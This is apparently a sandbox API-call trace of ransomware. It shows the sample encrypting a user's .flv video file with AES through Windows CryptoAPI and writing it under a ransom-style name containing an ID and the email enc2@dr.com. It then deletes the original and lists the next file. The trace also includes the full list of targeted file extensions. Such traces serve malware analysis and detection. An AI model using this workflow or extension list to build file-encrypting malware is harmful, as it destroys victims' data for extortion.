	[0201.006] lstrcpyW (in: lpString1=0x1889b4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\"
	[0201.006] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\", lpString2="2swzeiqW.flv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\2swzeiqW.flv") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\2swzeiqW.flv"
	[0201.006] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\2swzeiqW.flv") returned 124
	[0201.006] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0201.006] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\2swzeiqW.flv", cchLength=0x7c | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\2swzeiqw.flv") returned 0x7c
	[0201.006] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.007] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\2swzeiqw.flv", lpSrch="help_decrypt_your_files") returned 0x0
	[0201.007] lstrcpyW (in: lpString1=0x18855c, lpString2="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\2swzeiqw.flv" | out: lpString1="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\2swzeiqw.flv") returned="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\2swzeiqw.flv"
	[0201.007] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\2swzeiqw.flv") returned 124
	[0201.007] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0201.007] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.008] StrStrW (lpFirst=".flv", lpSrch=".") returned=".flv"
	[0201.008] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.008] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".flv") returned=".flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0201.008] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0201.008] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0201.008] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\2swzeiqw.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\2swzeiqw.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3ac
	[0201.012] ReadFile (in: hFile=0x3ac, lpBuffer=0xfe0198, nNumberOfBytesToRead=0x13cfc, lpNumberOfBytesRead=0x187f10, lpOverlapped=0x0 | out: lpBuffer=0xfe0198*, lpNumberOfBytesRead=0x187f10*=0x13cfc, lpOverlapped=0x0) returned 1
	[0201.016] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.016] CryptAcquireContextW (in: phProv=0x187ac0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x187ac0*=0xfcba18) returned 1
	[0201.054] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.054] CryptCreateHash (in: hProv=0xfcba18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x187ac4 | out: phHash=0x187ac4) returned 1
	[0201.054] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.054] CryptHashData (hHash=0xfb90f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0201.055] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.055] CryptDeriveKey (in: hProv=0xfcba18, Algid=0x6610, hBaseData=0xfb90f0, dwFlags=0x1, phKey=0x187ac8 | out: phKey=0x187ac8*=0xfb9130) returned 1
	[0201.055] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.055] CryptEncrypt (in: hKey=0xfb9130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x187adc*=0x13cfc, dwBufLen=0x13cfc | out: pbData=0x0*, pdwDataLen=0x187adc*=0x13d00) returned 1
	[0201.057] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0201.057] RtlMoveMemory (in: Destination=0xff3ea0, Source=0xfe0198, Length=0x13cfc | out: Destination=0xff3ea0) 
	[0201.058] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.058] CryptEncrypt (in: hKey=0xfb9130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xff3ea0*, pdwDataLen=0x187abc*=0x13cfc, dwBufLen=0x13d00 | out: pbData=0xff3ea0*, pdwDataLen=0x187abc*=0x13d00) returned 1
	[0201.060] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.060] CryptDestroyKey (hKey=0xfb9130) returned 1
	[0201.060] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.060] CryptDestroyHash (hHash=0xfb90f0) returned 1
	[0201.061] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.061] CryptReleaseContext (hProv=0xfcba18, dwFlags=0x0) returned 1
	[0201.061] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0201.061] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x187ad8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x187ad8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0201.062] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.062] GetUserNameA (in: lpBuffer=0x1879bc, pcbBuffer=0x187ad4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x187ad4) returned 1
	[0201.063] wsprintfW (in: param_1=0x187af0, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\2swzeiqw.flv.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 166
	[0201.063] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\2swzeiqw.flv.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\2swzeiqw.flv.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3b0
	[0201.065] WriteFile (in: hFile=0x3b0, lpBuffer=0xff3ea0*, nNumberOfBytesToWrite=0x13d00, lpNumberOfBytesWritten=0x187f18, lpOverlapped=0x0 | out: lpBuffer=0xff3ea0*, lpNumberOfBytesWritten=0x187f18*=0x13d00, lpOverlapped=0x0) returned 1
	[0201.071] CloseHandle (hObject=0x3b0) returned 1
	[0201.072] CloseHandle (hObject=0x3ac) returned 1
	[0201.072] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\2swzeiqw.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\2swzeiqw.flv")) returned 1
	[0201.102] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\2swzeiqw.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\2swzeiqw.flv")) returned 0
	[0201.102] FindNextFileW (in: hFindFile=0xfb92b0, lpFindFileData=0x188764 | out: lpFindFileData=0x188764*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93ddc260, ftCreationTime.dwHighDateTime=0x1d971ba, ftLastAccessTime.dwLowDateTime=0xa21ea700, ftLastAccessTime.dwHighDateTime=0x1d97533, ftLastWriteTime.dwLowDateTime=0xa21ea700, ftLastWriteTime.dwHighDateTime=0x1d97533, nFileSizeHigh=0x0, nFileSizeLow=0xb996, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName="60jDjQN9l5w2UkePxX.flv", cAlternateFileName="60JDJQ~1.FLV")) returned 1
	[0201.102] lstrcmpW (lpString1="60jDjQN9l5w2UkePxX.flv", lpString2="..") returned 1
	[0201.102] lstrcmpW (lpString1="60jDjQN9l5w2UkePxX.flv", lpString2=".") returned 1
